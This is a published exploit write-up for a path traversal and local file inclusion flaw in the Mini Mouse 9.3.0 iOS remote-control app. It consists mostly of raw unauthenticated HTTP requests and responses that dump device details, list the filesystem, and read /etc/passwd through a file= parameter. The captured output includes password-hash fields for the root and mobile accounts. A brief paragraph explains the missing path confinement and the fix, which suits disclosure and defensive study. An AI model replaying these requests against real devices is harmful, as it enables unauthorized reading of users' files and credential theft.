Mini Mouse 9.3.0 - Local File inclusion

Exploit Author: gosh Analysis Author: www.bubbleslearn.ir Category: WebApps Language: Unknown Published Date: 2021-04-06
# Exploit Title: Mini Mouse 9.3.0 - Local File inclusion / Path Traversal
# Author: gosh
# Date: 05-04-2021
# Vendor Homepage: http://yodinfo.com 
# Software Link: https://apps.apple.com/us/app/mini-mouse-remote-control/id914250948
# Version: 9.3.0
# Tested on: iPhone; iOS 14.4.2

GET /op=get_device_info HTTP/1.1
Host: 192.168.1.104:8039
Accept: */*
Accept-Language: en-TN;q=1, ar-TN;q=0.9, fr-TN;q=0.8
Connection: keep-alive
Accept-Encoding: gzip, deflate
User-Agent: MiniMouse/9.3.0 (iPhone; iOS 14.4.2; Scale/2.00)
Content-Length: 0


HTTP/1.1 200 OK
Server: bruce_wy/1.0.0
Access-Control-Allow-Methods: POST,GET,TRACE,OPTIONS
Access-Control-Allow-Headers: Content-Type,Origin,Accept
Access-Control-Allow-Origin: *
Access-Control-Allow-Credentials: true
P3P: CP=CAO PSA OUR
Content-Type: application/json
Content-Range: bytes 0-0/-1

{
"ret_code":1,
"ret_msg":"success",
"data":{
"uuid":"7E07125B-61BE-4F12-820C-FA706C445219",
"model":"iPhone",
"sys_name":"iOS",
"sys_version":"14.4.2",
"battery_state":0,
"battery_level":-1,
"memery_total_size":2983772160,
"device_name":"mobile",
"user_name":"iPhone",
"pwd":"",
"dir_user":"/var/mobile/Containers/Data/Application/EAD2E9B4-BC2F-4FD8-9D0C-6145E7044618/Documents/Download",
"dir_doc":"/var/mobile/Containers/Data/Application/EAD2E9B4-BC2F-4FD8-9D0C-6145E7044618/Documents",
"dir_desktop":"/var/mobile/Containers/Data/Application/EAD2E9B4-BC2F-4FD8-9D0C-6145E7044618/Desktop",
"sys_type":3
}
}



-------------------------------------------------------------------------------------


POST /op=get_file_list HTTP/1.1
Host: 192.168.1.104:8039
Accept: */*
Accept-Language: en-TN;q=1, ar-TN;q=0.9, fr-TN;q=0.8
Connection: keep-alive
Accept-Encoding: gzip, deflate
User-Agent: MiniMouse/9.3.0 (iPhone; iOS 14.4.2; Scale/2.00)
Content-Length: 0


HTTP/1.1 200 OK
Server: bruce_wy/1.0.0
Access-Control-Allow-Methods: POST,GET,TRACE,OPTIONS
Access-Control-Allow-Headers: Content-Type,Origin,Accept
Access-Control-Allow-Origin: *
Access-Control-Allow-Credentials: true
P3P: CP=CAO PSA OUR
Content-Type: application/json
Content-Range: bytes 0-0/-1

{
"ret_code":1,
"ret_msg":"success",
"data":{
"list":[{
"path":"//usr",
"is_local":true,
"is_hide":false,
"is_floder":true,
"name":"usr",
"name_display":"usr",
"file_size":288,
"create_time":0,
"update_time":0,
"sys_type":3
}, {
"path":"//bin",
"is_local":true,
"is_hide":false,
"is_floder":true,
"name":"bin",
"name_display":"bin",
"file_size":128,
"create_time":0,
"update_time":0,
"sys_type":3
}, {
"path":"//sbin",
"is_local":true,
"is_hide":false,
"is_floder":true,
"name":"sbin",
"name_display":"sbin",
"file_size":544,
"create_time":0,
"update_time":0,
"sys_type":3
}, {
"path":"//.file",
"is_local":true,
"is_hide":true,
"is_floder":false,
"name":".file",
"name_display":".file",
"file_size":0,
"create_time":0,
"update_time":0,
"sys_type":3
}, {
"path":"//etc",
"is_local":true,
"is_hide":false,
"is_floder":true,
"name":"etc",
"name_display":"etc",
"file_size":11,
"create_time":1577865.600000,
"update_time":1577865.600000,
"sys_type":3
}, {
"path":"//System",
"is_local":true,
"is_hide":false,
"is_floder":true,
"name":"System",
"name_display":"System",
"file_size":128,
"create_time":0,
"update_time":0,
"sys_type":3
}, {
"path":"//var",
"is_local":true,
"is_hide":false,
"is_floder":true,
"name":"var",
"name_display":"var",
"file_size":11,
"create_time":1577865.600000,
"update_time":1577865.600000,
"sys_type":3
}, {
"path":"//Library",
"is_local":true,
"is_hide":false,
"is_floder":true,
"name":"Library",
"name_display":"Library",
"file_size":672,
"create_time":0,
"update_time":0,
"sys_type":3
}, {
"path":"//private",
"is_local":true,
"is_hide":false,
"is_floder":true,
"name":"private",
"name_display":"private",
"file_size":224,
"create_time":0,
"update_time":0,
"sys_type":3
}, {
"path":"//dev",
"is_local":true,
"is_hide":false,
"is_floder":true,
"name":"dev",
"name_display":"dev",
"file_size":1395,
"create_time":0,
"update_time":0,
"sys_type":3
}, {
"path":"//.ba",
"is_local":true,
"is_hide":true,
"is_floder":true,
"name":".ba",
"name_display":".ba",
"file_size":64,
"create_time":0,
"update_time":0,
"sys_type":3
}, {
"path":"//.mb",
"is_local":true,
"is_hide":true,
"is_floder":true,
"name":".mb",
"name_display":".mb",
"file_size":64,
"create_time":0,
"update_time":0,
"sys_type":3
}, {
"path":"//tmp",
"is_local":true,
"is_hide":false,
"is_floder":true,
"name":"tmp",
"name_display":"tmp",
"file_size":15,
"create_time":1577865.600000,
"update_time":1577865.600000,
"sys_type":3
}, {
"path":"//Applications",
"is_local":true,
"is_hide":false,
"is_floder":true,
"name":"Applications",
"name_display":"Applications",
"file_size":3296,
"create_time":0,
"update_time":0,
"sys_type":3
}, {
"path":"//Developer",
"is_local":true,
"is_hide":false,
"is_floder":true,
"name":"Developer",
"name_display":"Developer",
"file_size":64,
"create_time":0,
"update_time":0,
"sys_type":3
}, {
"path":"//cores",
"is_local":true,
"is_hide":false,
"is_floder":true,
"name":"cores",
"name_display":"cores",
"file_size":64,
"create_time":0,
"update_time":0,
"sys_type":3
}]
}
}

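-------------------------
Using the directory path disclosed in the get_device_info response above (the "dir_user" field):
/var/mobile/Containers/Data/Application/EAD2E9B4-BC2F-4FD8-9D0C-6145E7044618/Documents/Download

The next request passes its parent Documents directory as "path" to get_file_list, and the server returns that directory's contents: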

POST /op=get_file_list HTTP/1.1
Host: 192.168.1.104:8039
Accept: */*
Accept-Language: en-TN;q=1, ar-TN;q=0.9, fr-TN;q=0.8
Connection: keep-alive
Accept-Encoding: gzip, deflate
User-Agent: MiniMouse/9.3.0 (iPhone; iOS 14.4.2; Scale/2.00)
Content-Length: 101

{"path": "/var/mobile/Containers/Data/Application/EAD2E9B4-BC2F-4FD8-9D0C-6145E7044618/Documents/"}


HTTP/1.1 200 OK
Server: bruce_wy/1.0.0
Access-Control-Allow-Methods: POST,GET,TRACE,OPTIONS
Access-Control-Allow-Headers: Content-Type,Origin,Accept
Access-Control-Allow-Origin: *
Access-Control-Allow-Credentials: true
P3P: CP=CAO PSA OUR
Content-Type: application/json
Content-Range: bytes 0-0/-1

{
"ret_code":1,
"ret_msg":"success",
"data":{
"list":[{
"path":"/var/mobile/Containers/Data/Application/EAD2E9B4-BC2F-4FD8-9D0C-6145E7044618/Documents//GDT",
"is_local":true,
"is_hide":false,
"is_floder":true,
"name":"GDT",
"name_display":"GDT",
"file_size":96,
"create_time":1617228.400302,
"update_time":1617228.400302,
"sys_type":3
}, {
"path":"/var/mobile/Containers/Data/Application/EAD2E9B4-BC2F-4FD8-9D0C-6145E7044618/Documents//input_photo.jpg",
"is_local":true,
"is_hide":false,
"is_floder":false,
"name":"input_photo.jpg",
"name_display":"input_photo.jpg",
"file_size":6141491,
"create_time":1617583.738397,
"update_time":1617583.738402,
"sys_type":3
}, {
"path":"/var/mobile/Containers/Data/Application/EAD2E9B4-BC2F-4FD8-9D0C-6145E7044618/Documents//Ico",
"is_local":true,
"is_hide":false,
"is_floder":true,
"name":"Ico",
"name_display":"Ico",
"file_size":64,
"create_time":1617583.334913,
"update_time":1617583.334913,
"sys_type":3
}, {
"path":"/var/mobile/Containers/Data/Application/EAD2E9B4-BC2F-4FD8-9D0C-6145E7044618/Documents//Download",
"is_local":true,
"is_hide":false,
"is_floder":true,
"name":"Download",
"name_display":"Download",
"file_size":64,
"create_time":1617228.371587,
"update_time":1617228.371587,
"sys_type":3
}]
}
}

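----------------------------------------------------------------------

In the request below, the file= parameter is given an absolute path outside the app's shared directories and the server returns the file contents. None of the requests shown carries a credential, and get_device_info reports an empty "pwd". The root cause is that the server does not confine the requested path to the shared directory: a fix would canonicalise the path, reject anything that resolves outside that directory, and require authentication on the HTTP service.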

GET /file=/etc/passwd HTTP/1.1
Host: 192.168.1.104:8039
Accept: */*
Accept-Language: en-TN;q=1, ar-TN;q=0.9, fr-TN;q=0.8
Connection: keep-alive
Accept-Encoding: gzip, deflate
User-Agent: MiniMouse/9.3.0 (iPhone; iOS 14.4.2; Scale/2.00)
Content-Length: 4

{}


HTTP/1.1 200 OK
Server: bruce_wy/1.0.0
Access-Control-Allow-Methods: POST,GET,TRACE,OPTIONS
Access-Control-Allow-Headers: Content-Type,Origin,Accept
Access-Control-Allow-Origin: *
Access-Control-Allow-Credentials: true
P3P: CP=CAO PSA OUR
Content-Type: application/octet-stream
Content-Range: bytes 0-0/2018
Content-Length : 2018

##
# User Database
# 
# This file is the authoritative user database.
##

nobody:*:-2:-2:Unprivileged User:/var/empty:/usr/bin/false
root:/smx7MYTQIi2M:0:0:System Administrator:/var/root:/bin/sh
mobile:/smx7MYTQIi2M:501:501:Mobile User:/var/mobile:/bin/sh
daemon:*:1:1:System Services:/var/root:/usr/bin/false
_ftp:*:98:-2:FTP Daemon:/var/empty:/usr/bin/false
_networkd:*:24:24:Network Services:/var/networkd:/usr/bin/false
_wireless:*:25:25:Wireless Services:/var/wireless:/usr/bin/false
_installd:*:33:33:Install Daemon:/var/installd:/usr/bin/false
_neagent:*:34:34:NEAgent:/var/empty:/usr/bin/false
_ifccd:*:35:35:ifccd:/var/empty:/usr/bin/false
_securityd:*:64:64:securityd:/var/empty:/usr/bin/false
_mdnsresponder:*:65:65:mDNSResponder:/var/empty:/usr/bin/false
_sshd:*:75:75:sshd Privilege separation:/var/empty:/usr/bin/false
_unknown:*:99:99:Unknown User:/var/empty:/usr/bin/false
_distnote:*:241:241:Distributed Notifications:/var/empty:/usr/bin/false
_astris:*:245:245:Astris Services:/var/db/astris:/usr/bin/false
_ondemand:*:249:249:On Demand Resource Daemon:/var/db/ondemand:/usr/bin/false
_findmydevice:*:254:254:Find My Device Daemon:/var/db/findmydevice:/usr/bin/false
_datadetectors:*:257:257:DataDetectors:/var/db/datadetectors:/usr/bin/false
_captiveagent:*:258:258:captiveagent:/var/empty:/usr/bin/false
_analyticsd:*:263:263:Analytics Daemon:/var/db/analyticsd:/usr/bin/false
_timed:*:266:266:Time Sync Daemon:/var/db/timed:/usr/bin/false
_gpsd:*:267:267:GPS Daemon:/var/db/gpsd:/usr/bin/false
_reportmemoryexception:*:269:269:ReportMemoryException:/var/empty:/usr/bin/false
_diskimagesiod:*:271:271:DiskImages IO Daemon:/var/db/diskimagesiod:/usr/bin/false
_logd:*:272:272:Log Daemon:/var/db/diagnostics:/usr/bin/false
_iconservices:*:276:276:Icon services:/var/empty:/usr/bin/false
_fud:*:278:278:Firmware Update Daemon:/var/db/fud:/usr/bin/false
_knowledgegraphd:*:279:279:Knowledge Graph Daemon:/var/db/knowledgegraphd:/usr/bin/false
_coreml:*:280:280:CoreML Services:/var/empty:/usr/bin/false

